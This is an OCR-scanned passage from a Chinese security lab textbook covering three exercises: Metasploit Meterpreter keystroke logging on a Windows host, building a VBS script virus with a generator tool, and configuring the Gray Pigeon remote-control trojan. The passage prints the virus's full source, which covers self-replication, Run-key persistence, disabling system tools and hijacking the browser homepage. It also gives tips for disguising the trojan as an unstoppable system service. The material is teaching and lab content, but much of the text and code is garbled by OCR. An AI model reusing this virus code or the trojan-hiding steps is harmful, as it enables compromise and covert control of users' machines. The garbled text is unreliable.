入 信息 的 监听 ,如 图 3-49 所 示 。 


,随便 输入 一 些 字 符 ( 如 uuuu)。 


A ,停止 键盘 记录 ,如 图 3-51 所 示 。 


$33 Linux 操作 系统 攻防 实 训 115 


x root@bt: ~ 

File Edit View Terminal Help 
chost .exe 

1280 408  Llogon.scr DCN-OTUOXLAM3PSMAdministrator  C:NWINDOWSXSystem32Alo 
gon.scr 

1316 452  dfssvc.exe NT AUTHORITYASYSTEM C: NWINDOWSXSystem32ADf 
SSvc.exe 

1512 1496 explorer.exe DCN-OTUOXLAM3PSMAdministrator  C:NWINDOWSXExplorer.EX 
E u 

1588 1512 ctfmon.exe DCN-OTUOXLAM3PSMAdministrator  C:WWTINDOWS A System32 Act 
fmon.exe 

1624 1512 cmd.exe DCN-OTUOXLAM3PSVAdministrator  C:NWINDOWSAsystem32NVcm 
d.exe 

1640 1624 conime.exe DCN-OTUOXLAM3PSMAdministrátor  C:NWINDOWSysystem32Nco 


nlme .exe 
1856 632  wmiprvse.exe NT AUTHORITYXSYSTEM C: \WINDOWS\ system32\wb 


emNwmiprvse,.exe 


meterpreter » migrate 1512 
[*] Migrating to 1512... 


[*] Migration completed successfully. 
meterpreter » getuid | " 
Server username ;«DCN- QFUOXLAMSPSNA dif T 1s t oit Ot F4 
meterpreter > Tart k 


EE 

m rpr r 
meterpreter 
meterpreter 
meterpreter 


图 3-48 ”开始 记录 键盘 信息 


^ v X rootgbt ~ 

File Edit View Terminal Help 

1588 1512 ctfmon.exe DCN-OTUOXLAM3P5MAdministrator C:\WINDOWS\system32\ct 
fmon.exe 

1624 1512 cmd.exe DCN-OTUOXLAM3PSXVAdministrator C:\WINDOWS\system32\cm 
d.exe 

1640 1624 conime.exe DCN-OTUOXLAM3PSMAdministrator  C:XWWINDOWSYASystem32Xco 
nime.exe 

1856 632  wmiprvse.exe NT AUTHORITYXSYSTEM C: VAWINDOWSASystem32Xwb 
emWwniprvse.exe 


meterpreter » migrate 1512 
[*] Migrating to 1512... 


[*] Migration completed successfully. 
meterpreter » getuid 
Server username: DCN-OTUOXLAM3PSXAdministrator 


meterpreter > keyscan start 


[-] unknown command: keyscan. 


meterpreter » keyscan start 
Starting the keystroke sniffer... 
peterpreter > 
meterpreter » 

meterpreter » 

meterpreter >Q. A 
meterpreter > : 

meterpreter > keyscan dump 
Dumping captured keystrokes.. 


meterpreter 
meterpreter 


图 3-49 ”进行 键盘 输入 信息 的 监听 


3.6.4 任务 与 思考 


本 实验 通过 一 个 具体 示例 ,介绍 了 Metasploit 框架 的 功能 特点 。 在 本 实验 中 ， 
ajana 框架 构 "ni Linux 环境 m 虽然 Metasploit E — 3X f Dr HJ JT ii x 4e d i sz | T. 
E ,但 也 可 以 安装 在 Windows 系统 上 
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^ v 其 rootgbt: ~ 
File Edit View Terminal Help 


d.exe 

1640 1624 conime.exe DCN-OTUOXLAM3PSMAdministrator C:\WINDOWS\system32\co 
nlme .exe 

1856 632  wmiprvse.exe NT AUTHORITYXSYSTEM C: WINDOWS system32Wwb 
em\wmiprvse. exe 


meterpreter > migrate 1512 
[*] Migrating to 1512... 


[*] Migration completed successfully. 
meterpreter » getuid 
Server username: DCN-OTUOXLAM3PSM Administrator 


meterpreter » keyscan start 
[-] Unknown command: keyscan. 


meterpreter » keyscan start 

Starting the keystroke sniffer... 
meterpreter 
meterpreter 
meterpreter 


ww w 


» 
- > kgyscan dümp 
Dumping captufd keystrokes. í 


meterpreter > 
meterpreter > 


meterpreter > 
meterpreter > keyscan dump 


Dumping captured keystrokes... 
uuuu 


meterpreter » 


图 3-50 ”获取 到 键盘 输入 的 信息 


^ v rootGbt: ~ 
File Edit View Terminal Help 


nime.exe 
1856 6032  wmiprvse.exe NT AUTHORITYNSYSTEM C: \WINDOWS\system32\wb 
emywmiprvse.exe 


meterpreter » migrate 1512 

[*】 Migrating to 1512... 

[*] Migration completed successfully. 
meterpreter » getuid 

Server username: DCN-OTUOXLAM3PSM Administrator 
meterpreter » keyscan start 

[-] Unknown command: keyscan. 
meterpreter » keyscan start 

Starting the keystroke sniffer... 
meterpreter 

meterpreter 

meterpreter 

meterpreter 

meterpreter 

meterpreter » keyscan dump 

Dumping captured keystrokes. $ ——— 


meterpreter > Ka 
meterpreter 

meterpreter 

meterpreter > 

meterpreter > keyscan dump 
Dumping captured keystrokes... 
uuuu 

meterpreter » keyscan stop 
Stopping the keystroke sniffer... 


meterpreter > 目 


图 3-51 停止 键盘 记录 


Mfg Windows 环境 下 安装 Metasploit 时 ,可 以 从 Metasploit 的 官方 网 站 (http:// 
www. metasploit. com/) 下 载 Windows 版 本 的 安装 程序 ,具体 的 安 半 过程 与 安 狼 其 他 
Windows 环境 下 的 应 用 程序 类 似 ,只 是 在 安 竣 前 需要 关闭 杀毒 软件 ,否则 会 因 杀 毒 软件 与 
Metasploit 冲突 ,导致 安 疲 失败 。 

Metasploit 目前 提供 了 3 种 用 户 使 用 接口 . GUI 模 式 、Console 模式 和 CLI( 命 令 行 ) 模 
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式 ( 原 来 还 提供 一 种 Web 模式 ,目前 已 经 不 再 支持 )。 这 3 种 模式 的 使 用 特点 各 异 , 一 般 建 
议 在 Console 模式 中 使 用 ,如 图 3-52 所 示 , 因 为 在 Console 模式 中 不 仅 可 以 使 用 Metasploit 
所 提供 的 所 有 功能 ,还 可 以 执行 其 他 的 外 部 命令 (如 ping). 


=~ etasploit 
File Edit View Help 


za- eD O0 9 


co ME. H5 XY x m 
G £O C CT Loo d dg gg 
) HC FEE ZI 
Il 


"[ metasploit v3.5.1-release [core:3.5 api:1.0] 
[ 635 exploits - 314 auxiliary 
+ ==- ---[ 215 payloads - 2? encoders - 8 nops 
=í svn r11338 updated 37 days ago (2010.12.14) 


Warning: This copy of the Metásploit Fr&mevork vas last updated 37 days ago. 
We recommend that you update the framevork at least every other day. 
For information on updating your copy of Metasploit, please see: 
http://wwwv.metasploit.com/redmine/projects/framevork/wiki/Updating 


msf » | 


B] 3-52 Metasploit 的 Console 模式 


希望 对 Linux 操作 不 是 很 熟悉 的 读者 可 以 选择 在 Windows 环境 下 安装 和 配置 
Metasploit 架构 。 

另外 ,在 本 实验 的 基础 上 ,读者 可 以 在 Metasploit 帮助 文档 和 技术 资料 的 帮助 下 ,通过 
具体 实验 ,掌握 Metasploit 的 主要 应 用 功能 。 


545€ 恶意 代码 攻防 实 训 


恶意 代码 是 计算 机 网 络 中 出 现 较 早 、 发 展 较 快 、 影 响 面 较 广 的 一 种 攻击 方式 ,尤其 是 计 
算 机 病毒 的 出 现 使 人 们 较 早 意识 到 计算 机 系统 及 信息 应 用 中 存在 的 安全 威胁 ,网 络 蠕虫 使 
大 家 真正 感受 到 了 计算 机 网 络 在 为 各 类 应 用 提供 便利 的 同时 也 快速 放大 了 恶意 攻击 的 实施 
范 围 ,木马 的 隐蔽 性 、 欺 骗 性 和 攻击 性 使 大 家 感受 到 了 互联 网 上 存在 的 种 种 陷阱 ,针对 操作 
系统 的 Rootkit 使 攻击 手段 从 系统 内 核 逐 渐 扩 展 到 应 用 程序 和 系统 引导 程序 。 在 大 量 的 安 
全 事件 中 ,恶意 代码 攻击 占 了 较 大 的 比例 。 为 此 ,加 强 对 恶意 代码 攻防 的 实 训 对 提供 安全 应 
对 能 力 将 起 到 十 分 重要 的 作用 。 


4.1 脚本 病毒 编写 实验 


4.1.1 预备 知识 : 脚本 的 攻防 


脚本 (Script) 通 第 可 以 由 应 用 程序 临时 调用 并 执行 。 各 类 脚本 被 广泛 地 应 用 于 Web 网 
页 设计 中 ,因为 脚本 不 仅 可 以 减 小 网 页 的 规模 和 提高 网 页 浏览 速度 ,而 且 可 以 丰 宫 网 页 的 显 
示 方 式 ( 如 动画 声音 等 )。 例 如 ,为 了 方便 联系 ,一 些 单位 喜欢 在 单位 网 站 的 显眼 位 置 链 接 
单位 或 领导 邮箱 的 地 址 , 当 用 户 单 击 网 页 上 的 邮箱 地 址 时 会 日 动 调用 本 地 计算 机 上 的 电子 
邮件 客户 端 软 件 ( 如 Outlook Express、Foxmail 等 ), 这 一 功能 就 是 通过 脚本 来 实现 的 。 

正 是 因为 脚本 具有 霹 法 和 结构 较为 简单 .脚本 程序 编写 容易 及 不 需要 事先 编 详 等 特点 ， 
往往 被 攻击 者 利用 。 例 如 ,在 脚本 中 加 入 一 些 破坏 计算 机 系统 的 命令 ,这 样 当 用 户 浏览 网 页 
时 ,一 旦 调用 这 类 脚本 , 便 会 使 用 户 的 系统 受到 攻击 。 

用 户 可 以 根据 对 所 访问 网 页 的 信任 程度 选择 安全 等 级 ,特别 是 对 于 那些 信任 度 较 低 网 
页 ,更 不 要 轻易 允许 使 用 脚本 。 


4.1.2 实验 目的 和 条 件 


1. 实验 目的 
WIRKE fix d SEE dE PAN. 

(1) 脚本 与 脚本 病毒 的 基本 概念 。 

(2) 常见 脚本 病毒 的 工作 原理 、 种 类 及 特点 。 
(3) 何 单 脚本 病毒 的 编写 方法 。 

(4) 常见 脚本 工具 的 使 用 方法 。 

2. 实验 条 件 


建议 本 实验 在 一 台 运 行 Windows XP 及 以 上 版 本 的 虚拟 机 上 进行 , 且 虚 拟 机 上 不 要 安 
装 杀 毒 软件 。 同 时 ,准备 实验 中 使 用 的 VBS 脚本 病毒 生成 器 软件 “病毒 制造 机 ”。 
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4.1.3 实验 过 程 


1. 制造 病毒 

制造 病毒 主要 操作 步骤 如 下 。 

步骤 1: 正常 登录 到 实验 场景 中 使 用 的 目标 主机 ,借助 脚本 病毒 生成 器 生成 脚本 病毒 。 
本 实验 使 用 的 是 “病毒 制造 机 v1. 0”, 在 该 软件 的 安装 过 程 中 , 当 出 现 如 图 4-1 所 示 的 “病毒 
复制 选项 ”界面 时 ,为 便于 读者 对 病毒 不 同 特征 的 理解 ,可 同时 选中 所 有 的 复 选 框 。 

步骤 2. 单 击 “ 下 一 步 ” 按 钮 ,进入 如 图 4-2 所 示 的 “禁止 功能 选项 ” 设 定 界 面 ,根据 需要 
进行 设 定 。 例 如 ,如 果 选 中 “禁止 右键 菜单 " 复 选 框 , 当 运 行 了 该 病毒 后 , 右 击 时 将 无 法 弹出 
快捷 菜单 。 


dj] 病毒 制造 机 vi.0 EE $ 病毒 制造 机 v1.0 


第 二 步 病毒 复制 选项 第 三 步 禁止 功能 选项 
禁止 “运行 ”菜单 开机 自动 运行 
[v] 复制 病毒 副本 到 WINDOWS 文 件 来 ( WINDOWS/WINNT) O 禁止 “关闭 系统 ”菜单 O 禁止 显示 点 面 所 有 图 标 
O Bae D] 禁止 进入 MIS-D0S 模 式 
y 2 
复制 病毒 副本 到 系统 交 件 夹 ( STSTEM/SYSTEM32 ) 回 禁止 使 用 注册 表 编辑 器 O 禁止 “任务 栏 和 开始 ” 
O 禁止 注册 表 扫 描 
| [] 禁止 “注销 ”菜单 O 禁用 “控制 面板 ” 
病毒 副本 文件 名 : O 禁止 进入 AS-D0s 实 模式 O 禁止 使 用 BE6 文 件 ( 危险 ) 


DY Y 上 - 步 | 2 下 - 步 | DY Uv 上 - 步 | nT- | 
图 4-1 选择 病毒 复制 方式 图 4-2 设置 “禁止 功能 选项 ” 


步骤 3: 单 击 “下 一 步 ” 按 钮 ,进入 如 图 4-3 所 示 的 “病毒 提示 对 话 框 ” 设 定 界面 时 ,根据 
需要 设置 有 关 开 机 时 病毒 的 执行 情况 。 当 选中 “设置 开机 提示 对 话 框 ” 复 选 框 ,并 设置 了 提 
示 框 标题 和 内 容 等 后 ,相关 信息 将 以 对 话 框 方式 在 开机 时 自动 显示 。 
步骤 4: 单 击 “ 下 一 步 ” 按 钮 ,进入 如 图 4-4 所 示 的 “病毒 传播 选项 ” 设 定 界面 ,根据 需要 
进行 设 定 。 当 选中 “通过 电子 邮件 进行 目 动 传播 (蠕虫 )” 复 选 框 时 ,病毒 可 以 向 指定 数量 的 
用 户 发 送 垃 圾 邮件 。 
病毒 制造 机 v1.0 c ig. 3 i| 病毒 制造 机 v1.0 
第 四 步 病毒 提示 对 话 框 第 五 步 病毒 传播 选项 
O 设置 开机 提示 对 活 框 O 通过 电子 邮件 进行 自动 传播 ( bo 
设置 开机 提示 框 标题 : | 


每 次 运行 自动 向 地 址 湾 中 的 前 


nd so。 B 
设置 开机 提示 框 内 容 : [ 名 发 送 带 毒 邮 件 。 


i 
i i 
MY 一 D BDY 


图 4-3 设置 开机 时 病毒 的 执行 情况 图 4-4 “病毒 传播 选项 ” 设 定 界面 


步骤 5: 单 击 “ 下 一 步 ” 按 钮 ,进入 “IE 修改 选项 ” 设 定 界面 ,根据 需要 进行 设 定 。 注 意 ， 
当选 中 “设置 默认 主页 ”" 复 选 框 后 ,会 弹出 “设置 主页 ”对 话 框 ,需要 读者 输入 要 修改 的 IE 浏 
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览 需 主页 地 址 ( 即 每 次 打开 IE 浏览 颖 时 默认 打开 的 主页 地 址 ) ,如 图 4-5 所 示 。 


b. MBA v1.0 


AF IE 你 改选 项 
回 wirt 


4-5 设置 还 浏览 器 修改 选项 


步骤 6: 单 击 “下 一 步 ” 按 钮 ,在 出 现 的 如 图 4-6 所 示 的 对 话 框 中 选择 所 生成 的 脚本 病毒 
存放 的 位 置 , 单 击 “ 开 始 制 造 ” 按 钮 ,生成 病毒 文件 。 


i| 病毒 制造 机 v1.0 


第 七 步 开始 制造 病毒 
请 输入 病毒 文件 存放 位 置 : 


: ‘Docunents and Settingsià 


"m — m 


4-6 选择 所 生成 的 脚本 病毒 存放 的 位 置 


此 时 ,可 看 到 相应 路 径 下 ,已 经 生成 了 脚本 病毒 文件 。 

2. 感染 病毒 并 观察 感染 后 的 系统 变化 情况 

主要 操作 步骤 如 下 。 

步骤 1: 将 生成 的 脚本 病毒 文件 置 于 虚拟 机 中 ,在 其 上 双击 使 之 运行 。 为 保证 完整 准确 
地 查看 病毒 的 感染 效果 ,可 重启 已 经 感染 了 病毒 的 虚拟 机 系统 。 然 后 ,根据 病毒 文件 生成 时 
的 设置 ,观察 系统 感染 了 病毒 后 的 表现 情况 。 

步骤 2i 观察 系统 文件 夹 下 的 异 稍 变化 ,可 以 发 现 , 在 C:\Windows、C:\Windows\ 
system32 下 多 了 不 明 来 源 的 脚本 文件 。 

步骤 3: 检查 各 项 系统 功能 ,发 现 右键 快捷 菜单 功能 被 禁止 。 在 “开始 ”菜单 中 , “运行 ” 
命令 被 去 除 ,利用 Win 十 R 组 合 键 (“运行 ”的 快捷 键 ) 时 ,会 弹出 报错 信息 ,如 图 4-7 Bron. 
在 C:\Windows 下 运行 注册 表 管理 器 程序 regedit. exe, 同样 也 会 弹出 报错 信息 ,提示 功能 
被 禁 , 如 图 4-8 Brzn 


往 册 表 编 辑 需 


X) 注册 编辑 已 被 管理 员 停 用 。 


图 4-7 系统 报错 信息 图 4-8 注册 表 编 辑 器 已 禁用 的 提示 信息 


y 
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步骤 4: 检查 I 浏览 器 的 各 项 功能 ,查看 异常 时 ,会 发 现 正 浏 览 需 主页 被 恶意 和 贷 改 。 
依次 选择 “菜单 栏 ” 一 “工具 ”一 “Internet 选项 ”选项 ,发 现 无 法 正常 打开 Internet 选项 。 男 
外 ,IE 浏览 右 的 右键 快捷 亲 单 功能 也 被 禁用 。 


CA 


脚本 病毒 代码 分 析 


分 析 脚 本 病毒 的 源码 ,理解 各 条 语句 的 含义 。 用 “记事 本 ”等 文本 编辑 工具 打开 病毒 肝 
本 ,查看 其 代码 。 代 码 内 容 摘 录 如 下 。 


O OANA UNB 


上 m 
e o 


um 
N 


13 


14 


15 


16 


17 


18 


On Error Resume Next 

Set fs = CreateObject(" Scripting. FileSystemObject") 

Set dirl = fs.GetSpecialFolder(0) 

Set dir2 = fs.GetSpecialFolder(1) 

Set so = CreateObject("Scripting. FileSystemObject" ) 

dim r 

Set r = CreateObject("Wscript.Shell") 

so. GetFile(WScript.ScriptFullName).Copy(dirl&" Win32system. vbs") 

so. GetFile(WScript.ScriptFullName).Copy(dir2&"N Win32system. vbs" ) 

so. GetFile(WScript. ScriptFullName).Copy(dirl&"MStart Menu\Programs\ 启 动 \ Win32system. vbs" ) 

r. Regwrite"HKCUM Sof twareMMicrosoft V WindowsNVCurrentVersionMV Policies V Explorer NNoRun", 1, 
"REG DWORD" 

r. Regwrite " HKCU \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ System V 
DisableRegistryTools",1,"REG DWORD" 

r. Regwrite " HKCU \ Software \ Microsoft V Windows \ CurrentVersion \ Policies V Explorer V 
NoLogOff",1,"REG DWORD" 

r. Regwrite " HKLM \ Software V Microsoft V Windows V CurrentVersion V Run V Win32system "," 
Win32system. vbs" 

r. Regwrite " HKCU XV Software V Microsoft V Windows \ CurrentVersion V Policies \ Explorer V 
NoViewContextMenu",1,"REG DWORD" 

r. Regwrite " HKCU \ Software \ Policies XV Microsoft XV InternetExplorer \ Restrictions V 
NoBrowserContextMenu",1,"REG DWORD" 

r. Regwrite " HKCU \ Software \ Policies \ Microsoft V Internet Explorer X Restrictions V 
NoBrowserOptions",1," REG DWORD" 

r.Regwrite "HKEY USERS\. DEFAULT\ Software\Microsoft\ Internet ExplorerMMainMStart Page", 
http://www. ta0ba0. com 


下 面 对 主 要 语句 的 含义 进行 分 析 。 

第 1 行 语句 的 含义 是 启用 错误 处 理 程序 ,目的 在 于 当 程 序 发 生 错 误 时 忽略 错误 而 继续 
癌 下 执行 ,从 而 不 要 打 断 程序 的 执行 流程 ,保证 后 续 的 代码 可 以 继续 执行 。 

第 3 行 和 第 4 行 语 句 中 ,使 用 了 GetSpecialFolder(Cfolderspec? PR ZX . 24 4 7. folderspec 
等 于 0 时 ,函数 返回 值 为 Windows 文件 夹 (一般 为 C:\Windows 或 C:\WINNT); 当 参 数 
folderspec 等 于 1 Ff, PR Zi x PHAN System XR CH ILF C:\Windows\system32)。 

第 8 一 10 行 语句 的 作用 依次 为 复制 病毒 文件 夹 到 Windows 文件 夹 .system32 XHK, 
[Ep 

"B 11-15 行 语句 的 作用 依次 为 禁止 “运行 ”菜单 .禁止 使 用 注册 表 编 辑 副 禁止 注销 菜 
单 . 开 机 上 月 动 运行 及 禁止 右键 快捷 菜单 。 

第 16 一 18 行 语句 的 作用 依次 为 茶 用 TE 浏览 大 右键 菜单 .禁止 Internet 选项 .设置 默认 
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主页 为 http://www. ta0ba0. com, 
4. 清除 病毒 脚本 的 编写 方法 


打开 “记事 本 ”程序 ,根据 病毒 脚本 内 容 , 请 读者 学 习 编 写 相 应 的 清除 病毒 的 脚本 ,内 容 
如 下 。 


Set fs = CreateObject("Scripting.FileSystemObject") 

Set dirl = fs.GetSpecialFolder(0) 

Set dir2 = fs.GetSpecialFolder(1) 

Set so = CreateObject("Scripting.FileSystemObject") 

dim r 

Set r = CreateObject("Wscript.Shell") 

r. Regwrite "HKLMMSoftwareMicrosoftWWindowsVCurrentVersionWNRunOnceMdeltree. exe", "start. 

exe /m deltree /y "&dirl&"X Win32system. vbs" 

8 r.Regwrite "HKLMMSoftwareMicrosoftMWWindowsNVCurrentVersionWRunOnceMdeltree. exe", "start. 
exe /m deltree /y "&dir2&"\ Win32system. vbs" 

9 r.Regwrite "HKLMMSoftwareMMicrosoftMWindowsNVCurrentVersionMRunOnceMdeltree. exe", "start. 
exe /m deltree /y "&dir1&"\Start MenuMPrograms Jr zljÀ Win32system. vbs" 

10 r.Regwrite"HKCUMSoftwareMMicrosoftMWindowsNCurrentVersion MV Policies V Explorer NNoRun" , 0, 
"REG DWORD" 

11 r. Regwrite " HKCU \ Software \ Microsoft V Windows \ CurrentVersion \ Policies V System V 
DisableRegistryTools",0,"REG DWORD" 

12 r.Regwrite"HKCUMSoftwareMMicrosoftMWindowsNVCurrentVersionMVPoliciesV Explorer NNoLogOff" , 
0,"REG DWORD" 

13 r.Regwrite "HKLMMSoftwareM Microsoft MWWindowsNVCurrentVersionNVRunN Win32system ","" 

14 r. Regwrite " HKCU \ Software V Microsoft V Windows \ CurrentVersion \ Policies \ Explorer V 
NoViewContextMenu",0,"REG DWORD" 

15 r. Regwrite " HKCU \ Software V Policies V Microsoft V Internet Explorer \ Restrictions V 
NoBrowserContextMenu",0,"REG DWORD" 

16 r. Regwrite " HKCU \ Software V Policies V Microsoft V Internet Explorer \ Restrictions V 
NoBrowserOptions",0,"REG DWORD" 

17 r.Regwrite "HKEY USERS\. DEFAULT\ Software\Microsoft\ Internet ExplorerMMainMStart Page", 

"about : blank" 


YOU AUNE 


将 以 上 脚本 语句 保存 为 一 个 . vbs 的 脚本 。 在 该 脚本 上 双击 运行 后 ,然后 重启 系统 , 即 
可 完成 病毒 的 消除 工作 。 


4.1.4 任务 与 思考 


在 本 实验 的 基础 上 ,读者 可 继续 学 习 脚 本 病毒 及 防范 方法 。 脚 本 病毒 是 计算 机 病毒 的 
一 种 新 形式 ,主要 采用 脚本 语言 编写 , 它 可 以 对 系统 进行 操作 ,包括 创建 ,修改 、 删 除 文 件 ,其 
至 格式 化 硬盘。 脚本 病毒 的 传播 速度 快 ,危害 性 大 。 仿 助 脚本 语言 的 特点 ,脚本 病毒 的 书写 
形式 灵活 ,容易 产生 变种 。 目 前 网 络 上 存在 的 脚本 病毒 绝 大 多 数 都 用 VBScript 和 
JavaScript 编写 。 

传统 的 病毒 检测 方法 包括 特征 代码 法 、 校 验 和 法 行为 监测 法 .软件 模拟 法 等 。 其 中 , 特 
征 代码 法 提取 病毒 的 某 一 小 段 特征 代码 进行 识别 ,所 以 对 未 知 病毒 几乎 无 法 预测 , 男 外 新 增 
病毒 的 数量 在 不 断 加 大 的 情况 下 ,病毒 特征 代码 的 数量 也 在 加 大 ,会 影响 检测 速度 ; 校 验 和 
法 是 对 文件 做 校 验 和 ,并 将 其 保存 ,一 旦 校 验 和 改变 ,就 视 为 异常 ,这 种 检测 方法 依赖 文件 长 
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度 和 内 容 , 预 警 过 于 敏感 容易 产生 误 报 ; 行为 监测 法 从 理论 上 讲 可 以 监测 到 所 有 未 知 病毒 ， 
但 是 实现 复杂 .速度 较 低 。 


4.2 木马 攻防 实验 


4.2.1 预备 知识 : 网 页 木马 的 攻击 原理 


从 技术 实现 来 看 ,网 页 木马 主要 利用 了 Web 浏览 器 软件 中 所 支持 的 客户 端 脚本 执行 能 
力 , 通 过 对 Web 浏览 器 软件 安全 漏洞 的 利用 而 对 客户 端 实施 渗透 攻击 ,在 获取 了 对 客户 端 
主机 的 远程 代码 执行 权限 后 再 植 人 木马 程序 ,进而 发 起 有 针对 性 的 攻击 。 从 发 展 历 程 来 看 ， 
网 页 木马 是 针对 网 络 服务 的 一 种 攻击 行为 ,只 是 早期 的 攻击 主要 针对 服务 器 软件 ,而 网 页 木 
马 则 主要 针对 Web 浏览 器 软件 。 

网 页 木马 顾名思义 是 指 主要 攻击 Web 网 页 的 木马 程序 ,其 核心 仍然 是 木马 ,只 是 攻击 
对 象 专门 针对 网 页 ,主要 利用 Web 浏览 器 软件 工作 机 制 存 在 的 安全 漏洞 而 进行 的 一 种 攻击 
行为 。 从 攻击 的 本 质 来 看 ,几乎 所 有 的 攻击 行为 都 是 一 种 漏洞 利用 ,这 种 漏洞 主要 包括 软件 
存在 的 安全 漏洞 ,以 及 因 安 全 策略 的 配置 不 当 或 错误 配置 导致 的 配置 漏洞 。 网 页 木马 同时 
利用 了 软件 的 安全 漏洞 和 配置 漏洞 。 

灰 铝 子 木马 是 国内 一 个 著名 的 后 门 程序 。 灰 铝 子 变种 木马 运行 后 ,会 和 月 我 复制 到 
Windows 目录 下 ,并 自行 将 安装 程序 删除 ; 修改 注册 表 ,将 病毒 文件 注册 为 服务 项 实现 开机 
自动 运行 ; 注入 指定 的 进程 中 隐藏 自我 ,防止 被 杀毒 软件 查 杀 ; 自动 开启 E 浏览 器 ,以 便 
与 外 界 进 行 通信 , 侦 听 攻击 者 的 指令 ,在 用 户 不 知情 的 情况 下 连接 攻击 者 指定 站 点 , 盗 取 用 
户 信息 、 下 载 其 他 特定 程序 。 


4.2.2 实验 目的 和 条 件 


1. 实验 目的 

在 学 习 木 马 工作 原理 的 基础 上 ,结合 本 实验 ,通过 具体 的 操作 继续 学 习 木 马 程序 的 产 
生 、 传 播 、 隐藏 和 攻击 方法 。 同 时 ,通过 对 木马 程序 清除 过 程 的 学 习 , 和 擎 握 日 帝 应 用 中 木马 程 
序 的 检测 和 清除 方法 。 

2. 实验 条 件 

本 实验 建议 读者 在 虚拟 机 环境 下 进行 ,需要 提供 两 台 虚 拟 机 ,分 别 为 客户 端 计 算 机 
VPCICIP 地 址 为 192. 168. 1. 115) 和 服务 器 端 计算 机 VPC2(IP 地 址 为 192. 168. 1. 116 ) , 操 
作 系 统 可 以 同时 使 用 Windows XP 或 其 他 的 版 本 。 

本 实验 使 用 了 灰 蚀 子 远 程控 制程 序 , 该 工具 虽然 主要 用 于 计算 机 的 远程 控制 管理 ,但 其 
工作 原理 和 过 程 与 木马 几乎 一 致 。 


4.2.3 实验 过 程 


1. 木马 攻击 的 实现 
实现 木马 攻击 的 主要 操作 步骤 如 下 。 
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步骤 1: 正常 登录 到 实验 场景 中 的 客户 端 计 算 机 (VPC1) ER" UK aS Tu Fed RE. 
成 功 安装 后 的 灰 饮 子 控制 端 界面 如 图 4-9 所 示 。 


oo KETARRA LADER] 192 168.1 115 ' (O09 
;文件 四 设置 @ IAD WP) ] 


— gr 


aate AERE 视频 语音 Telnet. 配置 服务 程序 晤 小 化 退出 
ame O O O sw — (0|esew[ | (mm 
1 .I|P-— ET [o] REAR: ol (er ] 


wr. 


4-9 RASTIE Sl dm y TR 


步骤 2i: 在 客户 端 生成 服务 器 端 程序 。 单 击 图 4-9 中 的 “配置 服务 程序 ?图 标 ,弹出 图 4-10 
所 示 的 操作 界面 ,对 服务 器 进行 配置 。 


MEUM mE DHS 解析 域名 或 固定 IP : 
TEE EE 

pum —€— 

Isi: 

ama: | [9] 


图 4-10 对 服务 器 进行 配置 


在 “IP 通知 http 访问 地 址 .DNS 解析 域名 或 固定 IP? 文 本 框 中 填写 客户 端 计 算 机 
(VPC1) 的 IP 地 址 (本 实验 为 192. 168. 1. 115) ,同时 可 以 设置 上 线 图 像 、 上 线 分 组 、 上 线 备 
注 .连接 密码 等 内 容 ,读者 可 以 根据 实验 需要 进行 设置 。 

选择 “启动 项 设置 ”选项 卡 , 在 如 图 4-11 所 示 的 对 话 框 中 配置 木马 的 启动 功能 。 读 者 可 
以 同时 选中 “Win98/2000/XP 下 写 入 注册 表 启 动 项 ”和 “Win2000/XP 下 优先 安 流 成 服务 启 
动 ” 复 选 框 。 在 “显示 名 称 ” 和 “服务 名 称 ” 文 本 框 中 可 以 任意 填写 (建议 尽量 填写 与 系统 有 关 
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的 单词 ); 在 “描述 信息 ”文本 框 中 说 明 此 项 服务 是 系统 服务 (此 处 的 设置 非常 重要 ,建议 选 
择 不 可 停止 的 服务 ,以 增加 蒙蔽 性 ,也 可 以 更 好 地 隐藏 自己 )。 

ER 
及 木马 程序 是 否 需要 进行 加 这 处 理 ( 本 实验 暂时 选中 “不 加 过” 单 选 按钮 )。 


(QOEM " (JC)09 Jg 
自动 上 线 设 置 | 安装 选项 | 启动 项 设置 | 代理 服务 | 高 级 选项 | 插件 功能 RE [SBE ASAD ES. EO 插件 功能 
V in98/2000/XP 下 写 入 注册 表 启动 项 使 用 IEXPLORE. EXE 进程 启动 服务 端 程序 
v in20007XE 下 忧 先 安装 成 服务 启动 v 隐 菩 服务 端 进 程 。 只 支持 Win2000/xp 系统 
T z indows power contro 说 明 : 
Eod: [Windows power control | a 


服务 名 称 ; 


描述 信息 :| 管理 window 系 统 电源 ， 十 分 重要 9 | wmm ORA w m 


^ 
保存 路 径 : p tools URBS AGS F 2006 ERE] ( 生成 服务 器 ] 


(SERRE : (D: cool s URB GS T 2006 MERC) ( 生成 服务 器 ] 


图 4-11 “启动 项 设置 ”选择 卡 图 4-12 “高 级 选项 ”选项 卡 


安 外 插件 。 灰 饮 子 提供 了 大 量 的 插件 功能 ,如 图 4-13 所 示 , 可 以 根据 日 己 的 需要 添加 
相应 的 插件 。 
配置 服务 右 结 束 后 , 单 击 “ 生 成 服务 顺 ?” 按 钮 ,提示 配置 成 功 , 如 图 4-14 所 示 。 


D: Vtools SES 883-2006 4| VUE f fr de E 9 $8. 
D: tools VB $8 3-20064E PUE EE RR e SR $8... 
D: tools REB G5 1200647 PUE BRE Hi iit SR US... 
D: nit EfkEUX... 
D: 提示 信息 [xc | THES dV M 
|... ]D»] 


d) 配置 服务 器 程序 成 功 


只 在 程序 实 
文人 路 径 : D | 


保存 路径 : D itools UBER GS 2006 31]. 保存 路 径 D cool s UEBER G8 T2006 418 3 
图 4-13 ZJx$S-F fe Bt df fF 图 4-14 配置 服务 器 程序 成 功 


步骤 3: 客户 端 (VPC1) 将 配置 好 的 服务 硕 程 序 (Server. exe? A 45 Hk 5$ tm CVPC2) nT LJ 
采用 共享 文件 夹 方式 发 送 ,具体 设置 方法 在 此 不 再 袭 述 。 

步骤 4: 在 服务 端 双击 Server. exe 文件 运行 ,然后 在 客户 端 就 会 看 到 服务 器 (肉鸡 ) 已 
经 上 线 , 如 图 4-15 所 示 。 可 以 看 到 服务 需 端 的 便 盘 分 区 情况 。 双 击 盘 符 , 可 以 进入 对 应 的 
硬盘 分 区 浏览 文件 ,还 可 以 进行 文件 的 删除 上传、 下 载 等 操作 。 

步骤 5: 首先 选择 "远程 控制 命令 ?选项 卡 ,然后 再 选择 下 方 的 “系统 操作 ?选项 卡 , 单 击 
“系统 信息 ”按钮 ,可 以 看 到 如 图 4-16 所 示 的 界面 。 通 过 该 操作 界面 ,客户 端 可 以 对 服务 需 
端 进行 获取 "系统 信息 ”重启 计算 机 有 关闭 计算 机 交 翻 载 服务 端 ? 等 操作 。 
